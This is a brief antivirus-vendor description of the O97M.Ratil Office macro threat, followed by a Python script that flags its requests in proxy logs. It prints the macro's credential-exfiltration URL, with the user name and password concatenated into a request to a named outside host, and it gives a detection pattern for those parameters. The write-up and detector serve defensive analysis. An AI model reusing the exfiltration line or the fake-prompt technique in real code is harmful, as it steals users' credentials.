
O97M.Ratil


First posted on 29 May 2014.
Source: Symantec

Aliases:

There are no other names known for O97M.Ratil.

Explanation:

The infected Microsoft Word and Microsoft Excel files contain macro code that sends a request to the following URL:
[http://]www.palmettogoodwill.org/files/report[REMOVED]MACRO_EXECUTED_WORD_SYNTA_PHARMA_P_ONLY&uname=NULL&pword=NULL

It then displays a dialogue box asking for user credentials.



When the user clicks OK, the macro code sends the stolen credentials to the following URL:
[http://]www.palmettogoodwill.org/files/report[REMOVED]SYNTA_PHARMA&uname=" & [USER NAME] & "&pword=" & [PASSWORD]

It then displays an image of a document from the Commonwealth of Massachusetts.
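A detection sketch for the two requests described above, added here as an example and not part of the original write-up: it scans web proxy log lines for requests to the host named above that carry both `uname` and `pword` parameters, and separates the initial NULL beacon from requests carrying entered credentials. The log format, the sample lines and the `PLACEHOLDER` text standing in for the elided part of the URL are assumptions.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Host taken from the write-up. The URL path is elided there ("[REMOVED]"),
# so matching relies on the host plus the two parameter names only.
C2_HOST = "www.palmettogoodwill.org"
PARAM = {n: re.compile(r"[?&]%s=([^&\s]*)" % n) for n in ("uname", "pword")}

# Constructed sample proxy log (assumed format: time client method url).
# "PLACEHOLDER" stands in for the elided portion of the real URL.
SAMPLE_LOG = """\
2014-05-29T10:01:02Z 10.0.0.5 GET http://www.palmettogoodwill.org/files/reportPLACEHOLDER&uname=NULL&pword=NULL
2014-05-29T10:01:40Z 10.0.0.5 GET http://www.palmettogoodwill.org/files/reportPLACEHOLDER&uname=jdoe&pword=constructed-value
2014-05-29T10:02:11Z 10.0.0.9 GET http://intranet.example/login?uname=a&pword=b
2014-05-29T10:03:00Z 10.0.0.9 GET http://www.palmettogoodwill.org/index.html
"""

def classify(url):
    """Return None, 'beacon' or 'credential_post' for one requested URL."""
    try:
        host = (urlsplit(url).hostname or "").lower()
    except ValueError:          # malformed URL in the log
        return None
    if host != C2_HOST:
        return None
    values = {}
    for name, rx in PARAM.items():
        m = rx.search(url)
        if not m:               # both parameters must be present
            return None
        values[name] = unquote_plus(m.group(1))
    if values["uname"] == "NULL" and values["pword"] == "NULL":
        return "beacon"         # macro ran, no credentials entered yet
    return "credential_post"    # user clicked OK in the dialogue box

def scan(log_text):
    """Return (timestamp, client, verdict) per hit; credential values are not echoed."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        ts, client, _method, url = fields[:4]
        verdict = classify(url)
        if verdict:
            hits.append((ts, client, verdict))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit)
```

A client that shows a `beacon` hit followed by a `credential_post` hit has had credentials submitted through the dialogue box, so those accounts should be treated as exposed.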

Last update 29 May 2014
